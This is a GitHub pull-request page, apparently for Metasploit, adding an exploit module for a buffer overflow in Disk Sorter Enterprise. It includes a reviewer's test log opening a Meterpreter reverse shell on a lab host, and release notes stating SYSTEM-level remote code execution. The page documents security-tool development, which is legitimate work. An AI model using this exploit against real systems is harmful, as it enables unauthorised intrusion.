Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Buffer Overflow on Disk Sorter Enterprise #8266

Merged
merged 4 commits into from Apr 24, 2017
Merged

Buffer Overflow on Disk Sorter Enterprise #8266

merged 4 commits into from Apr 24, 2017

Conversation

DanielRTeixeira
Copy link
Contributor

@DanielRTeixeira
Add files via upload
f1c5144 
Buffer Overflow on Disk Sorter Enterprise
@h00die
Copy link
Contributor

h00die commented Apr 23, 2017

Can you please add docs

h00die
h00die reviewed Apr 23, 2017
View reviewed changes
modules/exploits/windows/http/disksorter_bof.rb Outdated
'Name' => 'Disk Sorter Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of Disk Sorter Enterprise v9.5.12,caused by
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

space after ,

@DanielRTeixeira
Copy link
Contributor Author

Done, let me know if you need anything else.

@h00die
Copy link
Contributor

h00die commented Apr 24, 2017

docs are .md not .rb.md

you should be able to use your module, then do info -d and view it in a browser to know you did it correctly

@wchen-r7 wchen-r7 self-assigned this Apr 24, 2017
@wchen-r7
Copy link
Contributor

I will test this PR. Thanks!

@wchen-r7
Copy link
Contributor

The exploit works for me:

msf exploit(disksorter_bof) > show options

Module options (exploit/windows/http/disksorter_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.146.173  yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.146.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Sorter Enterprise v9.5.12


msf exploit(disksorter_bof) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Sending request...
[*] Sending stage (957487 bytes) to 192.168.146.173
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.173:1051) at 2017-04-24 17:15:39 -0500

Also the doc is easy to follow. Great job!

@wchen-r7 wchen-r7 merged commit a404a1e into rapid7:master Apr 24, 2017
wchen-r7 added a commit that referenced this pull request Apr 24, 2017
@wchen-r7
Land #8266, Add Buffer Overflow Exploit on Disk Sorter Enterprise
3208986
@wchen-r7
Copy link
Contributor

wchen-r7 commented Apr 24, 2017
edited by tdoan-r7

Release Notes

The exploit/windows/http/disksorter_bof module has been added to the framework. It exploits a buffer overflow vulnerability in Disk Sorter Enterprise. By sending a specially crafted string in an HTTP GET request, you can gain arbitrary remote code execution under the context of SYSTEM.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@h00die h00die h00die left review comments

Assignees

@wchen-r7 wchen-r7

Labels
feature module needs-docs
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@DanielRTeixeira @h00die @wchen-r7 @tdoan-r7